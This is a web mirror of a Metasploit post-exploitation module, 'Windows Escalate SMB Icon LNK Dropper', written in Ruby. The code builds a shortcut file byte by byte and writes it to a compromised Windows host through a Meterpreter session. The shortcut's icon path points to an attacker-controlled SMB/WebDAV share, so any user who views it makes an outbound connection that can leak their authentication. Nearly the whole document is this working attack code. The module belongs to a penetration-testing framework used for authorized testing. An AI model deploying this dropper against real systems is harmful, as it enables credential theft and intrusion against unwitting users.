CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/escalate/droplnk.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  def initialize(info = {})

9
    super(

10
      update_info(

11
        info,

12
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',

13
        'Description' => %q{

14
          This module drops a shortcut (LNK file) that has a ICON reference

15
          existing on the specified remote host, causing SMB and WebDAV

16
          connections to be initiated from any user that views the shortcut.

17
        },

18
        'License' => MSF_LICENSE,

19
        'Author' => [ 'mubix' ],

20
        'Platform' => [ 'win' ],

21
        'SessionTypes' => [ 'meterpreter' ],

22
        'Compat' => {

23
          'Meterpreter' => {

24
            'Commands' => %w[

25
              core_channel_eof

26
              core_channel_open

27
              core_channel_read

28
              core_channel_write

29
              stdapi_fs_getwd

30
            ]

31
          }

32
        }

33
      )

34
    )

35
    register_options(

36
      [

37
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),

38
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),

39
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),

40
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])

41
      ]

42
    )

43
  end

44


45
  def run

46
    print_status 'Creating evil LNK'

47
    lnk = ''

48
    lnk << "\x4c\x00\x00\x00"                  # Header size

49
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  # Link CLSID

50
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"

51
    lnk << "\xdb\x00\x00\x00"                  # Link flags

52
    lnk << "\x20\x00\x00\x00"                  # File attributes

53
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Creation time

54
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Access time

55
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Write time

56
    lnk << "\x00\x00\x00\x00"                  # File size

57
    lnk << "\x00\x00\x00\x00"                  # Icon index

58
    lnk << "\x01\x00\x00\x00"                  # Show command

59
    lnk << "\x00\x00"                          # Hotkey

60
    lnk << "\x00\x00"                          # Reserved

61
    lnk << "\x00\x00\x00\x00"                  # Reserved

62
    lnk << "\x00\x00\x00\x00"                  # Reserved

63
    lnk << "\x7b\x00"                          # IDListSize

64
    # sIDList

65
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"

66
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"

67
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"

68
    lnk << 'C:\\'

69
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

70
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"

71
    lnk << "\x00"

72
    lnk << 'AUTOEXEC.BAT'

73
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"

74
    lnk << "\x5b\x15\x14\x00\x00\x00"

75
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')

76
    lnk << "\x00\x00\x1c\x00\x00\x00"

77
    # sLinkInfo

78
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"

79
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"

80
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"

81
    lnk << "\x00\x00\x00"

82
    lnk << 'C:\\AUTOEXEC.BAT'

83
    lnk << "\x00\x00\x0e\x00"

84
    # RELATIVE_PATH

85
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')

86
    lnk << "\x03\x00"

87
    # WORKING_DIR

88
    lnk << Rex::Text.to_unicode('C:\\')

89
    # ICON LOCATION

90
    lnk << "\x1c\x00"

91
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")

92
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"

93
    lnk << 'computer'

94
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

95
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

96
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"

97
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"

98
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"

99


100
    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"

101
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')

102
    file.write(lnk)

103
    file.close

104
    print_status 'Done. Wait for evil to happen..'

105
  end

106
end

107


108